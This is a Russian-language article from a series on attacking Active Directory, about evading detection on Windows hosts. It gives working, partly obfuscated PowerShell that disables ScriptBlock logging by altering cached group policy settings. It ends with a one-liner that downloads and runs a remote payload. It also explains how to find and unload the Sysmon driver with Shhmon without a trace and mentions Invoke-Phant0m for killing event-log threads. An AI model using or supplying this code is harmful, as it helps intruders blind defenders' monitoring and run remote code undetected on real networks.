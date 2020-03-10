Содержание статьи
Предыдущие части этого цикла статей про атаки на Active Directory:
- Разведка в Active Directory. Получаем пользовательские данные в сетях Windows без привилегий
- Атаки на Active Directory. Разбираем актуальные методы повышения привилегий
- Боковое перемещение в Active Directory. Разбираем техники Lateral Movement при атаке на домен
- Защита от детекта в Active Directory. Уклоняемся от обнаружения при атаке на домен
Обход журналирования PowerShell ScriptBlock
С выходом Windows 10 и PowerShell 5.0 компания Microsoft представила несколько новых функций безопасности для PowerShell, в числе которых — ведение журнала ScriptBlock. Эта функция создает большие проблемы для атакующего (будь то редтимер, пентестер, исследователь или злоумышленник), так как регистрирует абсолютно все подозрительные действия в PowerShell. И созданные ScriptBlock журналы подлежат анализу стороной защиты.
WARNING
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Как и в случае с любой службой логирования, ведением журнала ScriptBlock управляют с помощью параметров групповой политики. PowerShell запрашивает его каждый раз, когда обнаруживает новый ScriptBlock, чтобы определить, нужно ли его регистрировать. Но дело в том, что PowerShell выполняет запрос один раз, кеширует его в памяти и возвращает при каждом обращении. Таким образом, эти параметры могут быть легко изменены с помощью следующего кода.
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
Указанные действия можно выполнить, не обладая привилегиями администратора и не трогая реестр, что позволяет нам сделать это незаметно. Но есть одно ограничение. Новые политики применяются после проверки параметров, которые будут просмотрены, когда завершится первый SciptBlock, что приведет к регистрации события. Поэтому данный триггерный ScriptBlock должен быть максимально обфусцирован и не должен нести никакой полезной нагрузки. То есть выполняется он специально для завершения журналирования.
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
$val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$val.Add('EnableScriptB'+'lockLogging', 0)
$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
$GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
}
iex (New-Object Net.WebClient).downloadstring("https://server/payload.ps1")
Приведенный выше скрипт выполняет триггер для журнала, проверяет параметры логирования и запускает полезную нагрузку в обход журналирования.
Уклонение от регистрации Sysmon
Системный монитор (Sysmon) — это системная служба Windows, предназначенная для мониторинга и регистрации активности системы в журнале событий Windows. Она предоставляет подробную информацию о создании процессов, о сетевых подключениях и изменениях времени создания файлов. Sysmon генерирует с помощью Windows Event Collection или агентов SIEM события и собирает их. Анализ собранных событий помогает идентифицировать вредоносную или аномальную активность. Что очень важно, Sysmon не предоставляет анализ событий, которые он генерирует, а также не пытается защитить систему или спрятаться от злоумышленников.
Sysmon — мощное средство анализа и представляет большую проблему для оператора, так как позволяет обнаружить различные индикаторы вредоносной активности, например создание процессов, файлов, потоков или изменение реестра. Сам Sysmon состоит из системной службы и драйвера, который предоставляет службе информацию. Хотя Sysmon и не пытается себя скрыть, но имя службы и имя драйвера по умолчанию могут быть изменены.
В любом случае измененное имя драйвера не проблема, так как у каждого драйвера есть своя аптитуда — уникальный идентификатор, который указывает положение драйвера относительно остальных в стеке файловой системы. Таким образом, Sysmon имеет предопределенное значение
385201. То есть мы сможем обнаружить данный драйвер, даже если его переименуют.
Для выгрузки драйвера можно использовать
fltMC, но перед этим Sysmon запротоколирует данное действие в журнале командной строки. Лучше использовать функции
FIlterFindFirst() и
FilterFindNext() из библиотеки
fltlib.dll, чтобы найти и выгрузить драйвер с аптитудой
385201 без регистрации этого события.
Shhmon использует эти функции для выгрузки драйвера. Чтобы это сделать, токен процесса должен иметь привилегию
SeLoadDriverPrivileges, которая имеется у Shhmon за счет
advapi32!AdjustTokenPrivileges.
Таким образом, мы без детекта можем обнаружить даже переименованный драйвер Sysmon. Для этого используем Shhmon с параметром
hunt.
Затем выгружаем драйвер, используя Shhmon с параметром
kill.
Служба Sysmon остается активной, но уже без возможности собирать события и анализировать журналы! Правда, это происходит не бесследно, так как перед выгрузкой драйвера будет сгенерировано событие Sysmon с ID 255 —
DriverCommunication.
Плюс ко всему использование привилегии
SeLoadDriverPrivileges без протоколирования доступно только для
NT AUTHORITY\SYSTEM, в противном случае будет сгенерировано событие безопасности с ID 4672. Тем не менее активный сбор и анализ данных с помощью Sysmon перестанет быть для нас проблемой.
В качестве дополнения можно сказать про инструмент под названием Invoke-Phant0m. Этот сценарий просматривает стеки потоков процесса службы журнала событий и определяет, какие из потоков подлежат уничтожению. Таким образом, система не сможет собирать журналы, и в то же время служба журнала событий будет работать.
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